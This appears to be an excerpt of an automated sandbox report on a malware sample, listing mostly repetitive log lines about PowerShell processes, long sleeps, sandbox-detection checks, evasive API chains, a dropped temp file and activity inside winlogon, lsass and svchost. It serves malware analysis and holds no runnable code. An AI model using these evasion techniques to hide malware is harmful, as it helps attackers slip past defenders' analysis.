Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Contains functionality to compare user and computer (likely to detect sandboxes)

Source: C:\Windows\System32\dialer.exe

4_2_00007FF78AB310C0

Contains long sleeps (>= 3 min)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4262	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5599	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5847	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3921	Jump to behavior
Source: C:\Windows\System32\winlogon.exe	Window / User API: threadDelayed 8389	Jump to behavior
Source: C:\Windows\System32\winlogon.exe	Window / User API: threadDelayed 1610	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Window / User API: threadDelayed 9926	Jump to behavior
Source: C:\Windows\System32\dwm.exe	Window / User API: threadDelayed 9872	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6812
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2937
Source: C:\Windows\System32\dialer.exe	Window / User API: threadDelayed 1287
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6965
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2662

Found dropped PE file which has not been started or loaded

Source: C:\Users\user\Desktop\ylVAEHbMLf.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\yfiogronfirx.tmp

Jump to dropped file

Found evasive API chain (may stop execution after accessing registry keys)

Source: C:\Windows\System32\dwm.exe	Evasive API call chain: RegOpenKey,DecisionNodes,Sleep
Source: C:\Windows\System32\svchost.exe	Evasive API call chain: RegOpenKey,DecisionNodes,Sleep
Source: C:\Windows\System32\winlogon.exe	Evasive API call chain: RegOpenKey,DecisionNodes,Sleep

Found evasive API chain checking for process token information

Source: C:\Windows\System32\dialer.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

Found large amount of non-executed APIs

Source: C:\Windows\System32\winlogon.exe	API coverage: 7.8 %
Source: C:\Windows\System32\lsass.exe	API coverage: 8.5 %
Source: C:\Windows\System32\svchost.exe	API coverage: 6.2 %
Source: C:\Windows\System32\svchost.exe	API coverage: 6.0 %
Source: C:\Windows\System32\svchost.exe	API coverage: 3.4 %
Source: C:\Windows\System32\svchost.exe	API coverage: 6.2 %
Source: C:\Windows\System32\svchost.exe	API coverage: 7.0 %
Source: C:\Windows\System32\svchost.exe	API coverage: 7.7 %
Source: C:\Windows\System32\svchost.exe	API coverage: 6.0 %
Source: C:\Windows\System32\svchost.exe	API coverage: 7.5 %
Source: C:\Windows\System32\svchost.exe	API coverage: 5.7 %
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	API coverage: 1.4 %
Source: C:\Windows\System32\svchost.exe	API coverage: 6.2 %
Source: C:\Windows\System32\svchost.exe	API coverage: 3.5 %
Source: C:\Windows\System32\svchost.exe	API coverage: 6.2 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6200	Thread sleep count: 4262 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6200	Thread sleep count: 5599 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2484	Thread sleep time: -7378697629483816s >= -30000s	Jump to behavior
Source: C:\Windows\System32\dialer.exe TID: 2180	Thread sleep count: 91 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2656	Thread sleep count: 5847 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2568	Thread sleep count: 3921 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6304	Thread sleep time: -8301034833169293s >= -30000s	Jump to behavior
Source: C:\Windows\System32\winlogon.exe TID: 6428	Thread sleep count: 8389 > 30	Jump to behavior
Source: C:\Windows\System32\winlogon.exe TID: 6428	Thread sleep time: -8389000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\winlogon.exe TID: 6428	Thread sleep count: 1610 > 30	Jump to behavior
Source: C:\Windows\System32\winlogon.exe TID: 6428	Thread sleep time: -1610000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\lsass.exe TID: 2504	Thread sleep count: 9926 > 30	Jump to behavior
Source: C:\Windows\System32\lsass.exe TID: 2504	Thread sleep time: -9926000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7044	Thread sleep count: 274 > 30	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7044	Thread sleep time: -274000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\dwm.exe TID: 6228	Thread sleep count: 9872 > 30	Jump to behavior
Source: C:\Windows\System32\dwm.exe TID: 6228	Thread sleep time: -9872000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6380	Thread sleep count: 251 > 30	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6380	Thread sleep time: -251000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6324	Thread sleep count: 253 > 30	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6324	Thread sleep time: -253000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 4208	Thread sleep count: 253 > 30	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 4208	Thread sleep time: -253000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 3512	Thread sleep count: 248 > 30	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 3512	Thread sleep time: -248000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 3704	Thread sleep count: 199 > 30	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 3704	Thread sleep time: -199000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 4180	Thread sleep count: 253 > 30	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 4180	Thread sleep time: -253000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7096	Thread sleep count: 232 > 30	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7096	Thread sleep time: -232000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 5724	Thread sleep count: 250 > 30	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 5724	Thread sleep time: -250000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4348	Thread sleep count: 6812 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7072	Thread sleep count: 2937 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7124	Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7156	Thread sleep count: 249 > 30	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7156	Thread sleep time: -249000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 2996	Thread sleep count: 249 > 30
Source: C:\Windows\System32\svchost.exe TID: 2996	Thread sleep time: -249000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5740	Thread sleep count: 242 > 30
Source: C:\Windows\System32\svchost.exe TID: 5740	Thread sleep time: -242000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6376	Thread sleep count: 232 > 30
Source: C:\Windows\System32\svchost.exe TID: 6376	Thread sleep time: -232000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 3632	Thread sleep count: 249 > 30
Source: C:\Windows\System32\svchost.exe TID: 3632	Thread sleep time: -249000s >= -30000s
Source: C:\Windows\System32\dialer.exe TID: 4284	Thread sleep count: 1287 > 30
Source: C:\Windows\System32\dialer.exe TID: 4284	Thread sleep time: -128700s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5264	Thread sleep count: 252 > 30
Source: C:\Windows\System32\svchost.exe TID: 5264	Thread sleep time: -252000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 416	Thread sleep count: 6965 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 416	Thread sleep count: 2662 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1456	Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5180	Thread sleep count: 251 > 30
Source: C:\Windows\System32\svchost.exe TID: 5180	Thread sleep time: -251000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7124	Thread sleep count: 249 > 30
Source: C:\Windows\System32\svchost.exe TID: 7124	Thread sleep time: -249000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 2568	Thread sleep count: 242 > 30
Source: C:\Windows\System32\svchost.exe TID: 2568	Thread sleep time: -242000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6740	Thread sleep count: 221 > 30
Source: C:\Windows\System32\svchost.exe TID: 6740	Thread sleep time: -221000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6404	Thread sleep count: 249 > 30
Source: C:\Windows\System32\svchost.exe TID: 6404	Thread sleep time: -249000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5744	Thread sleep count: 50 > 30
Source: C:\Windows\System32\svchost.exe TID: 5744	Thread sleep time: -50000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 3716	Thread sleep count: 248 > 30
Source: C:\Windows\System32\svchost.exe TID: 3716	Thread sleep time: -248000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 2656	Thread sleep count: 251 > 30
Source: C:\Windows\System32\svchost.exe TID: 2656	Thread sleep time: -251000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 4192	Thread sleep count: 240 > 30
Source: C:\Windows\System32\svchost.exe TID: 4192	Thread sleep time: -240000s >= -30000s
Source: C:\Windows\System32\spoolsv.exe TID: 3444	Thread sleep count: 251 > 30
Source: C:\Windows\System32\spoolsv.exe TID: 3444	Thread sleep time: -251000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 4856	Thread sleep count: 247 > 30
Source: C:\Windows\System32\svchost.exe TID: 4856	Thread sleep time: -247000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 2192	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6200	Thread sleep count: 231 > 30
Source: C:\Windows\System32\svchost.exe TID: 6200	Thread sleep time: -231000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 1856	Thread sleep count: 251 > 30
Source: C:\Windows\System32\svchost.exe TID: 1856	Thread sleep time: -251000s >= -30000s

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\dialer.exe	Last function: Thread delayed
Source: C:\Windows\System32\dialer.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\dwm.exe	Last function: Thread delayed
Source: C:\Windows\System32\dwm.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\dialer.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\spoolsv.exe	Last function: Thread delayed
Source: C:\Windows\System32\spoolsv.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed

Source: C:\Windows\System32\winlogon.exe	Code function: 7_2_00000225DC64BE3C FindFirstFileExW,	7_2_00000225DC64BE3C
Source: C:\Windows\System32\winlogon.exe	Code function: 7_2_00000225DC6ABE3C FindFirstFileExW,	7_2_00000225DC6ABE3C
Source: C:\Windows\System32\lsass.exe	Code function: 8_2_00000202C0AEBE3C FindFirstFileExW,	8_2_00000202C0AEBE3C
Source: C:\Windows\System32\svchost.exe	Code function: 9_2_000002A66130BE3C FindFirstFileExW,	9_2_000002A66130BE3C
Source: C:\Windows\System32\dwm.exe	Code function: 10_2_000002BAAE29BE3C FindFirstFileExW,	10_2_000002BAAE29BE3C
